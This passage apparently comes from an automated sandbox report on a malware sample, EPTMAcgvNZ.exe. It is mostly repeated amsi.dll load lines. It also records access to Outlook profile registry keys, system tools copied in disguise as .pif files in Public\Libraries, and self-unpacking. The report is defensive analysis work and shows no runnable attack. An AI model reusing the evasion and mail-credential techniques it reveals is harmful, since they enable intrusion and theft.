            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\Public\Libraries\yihfsboC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: EPTMAcgvNZ.exeStatic file information: File size 1297920 > 1048576
            Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdb source: EPTMAcgvNZ.exe, EPTMAcgvNZ.exe, 00000000.00000002.1396601704.0000000020840000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1355304078.0000000002326000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1396601704.00000000207F0000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1252312705.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000001160000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: _.pdb source: yihfsboC.pif, 0000000E.00000003.1357241369.0000000024219000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2540746609.0000000027061000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2535779078.0000000025D2B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, yihfsboC.pif, 00000017.00000003.1465818240.00000000327BE000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2540455156.000000003429B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2546648768.0000000035951000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2532622056.000000002859B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2537622019.0000000029911000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000003.1551837223.00000000268CE000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: cmd.pdbUGP source: esentutl.exe, 0000000B.00000003.1343597918.0000000005650000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000010.00000002.1408812461.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000012.00000000.1420522255.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000013.00000002.1534376052.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001B.00000002.1582953816.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001C.00000002.1619637523.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1624785769.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif.11.dr
            Source: Binary string: ping.pdbGCTL source: esentutl.exe, 0000000F.00000003.1355379307.0000000005960000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000014.00000002.1533195513.0000000000381000.00000020.00000001.01000000.0000000B.sdmp, xpha.pif.15.dr
            Source: Binary string: easinvoker.pdbH source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdbGCTL source: EPTMAcgvNZ.exe, 00000000.00000002.1396601704.0000000020840000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1347686581.00000000217CE000.00000004.00000020.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1347686581.000000002179D000.00000004.00000020.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1355304078.0000000002326000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1396601704.00000000207F0000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1252312705.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000001160000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 00000013.00000002.1534376052.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001B.00000002.1582953816.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001C.00000002.1619637523.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1624785769.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif.11.dr
            Source: Binary string: ping.pdb source: esentutl.exe, 0000000F.00000003.1355379307.0000000005960000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000014.00000002.1533195513.0000000000381000.00000020.00000001.01000000.0000000B.sdmp, xpha.pif.15.dr

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\Public\Libraries\yihfsboC.pifUnpacked PE file: 14.2.yihfsboC.pif.400000.5.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Source: C:\Users\Public\Libraries\yihfsboC.pifUnpacked PE file: 23.2.yihfsboC.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Source: C:\Users\Public\Libraries\yihfsboC.pifUnpacked PE file: 26.2.yihfsboC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Detected unpacking (overwrites its own PE header)
